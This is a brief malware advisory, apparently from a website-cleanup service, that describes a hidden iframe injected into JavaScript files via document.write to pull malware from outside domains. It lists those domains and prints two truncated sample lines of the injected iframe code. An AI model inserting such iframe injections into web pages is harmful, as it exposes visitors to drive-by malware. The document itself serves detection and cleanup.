Description:
Malicious iframe hidden inside a javascript file and getting loaded with a document.write call. It is used to distribute malware from external web sites while not being visible to the user.
Domains used in this attack:
mainborder.com
pzl3.co.cc
lcbmc.co.uk
bluekai.com
carolinsoll.cz.cc
Affecting:
Any web site sites (no specific target)
Clean up:
This malware is generally hidden inside the javascript files. Sign up here to get it clean up: Signup
Malware dump (sample of malware):
document.write("<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750" ...
document . write("<iframe src="http://mainborder.com/i n.cgi..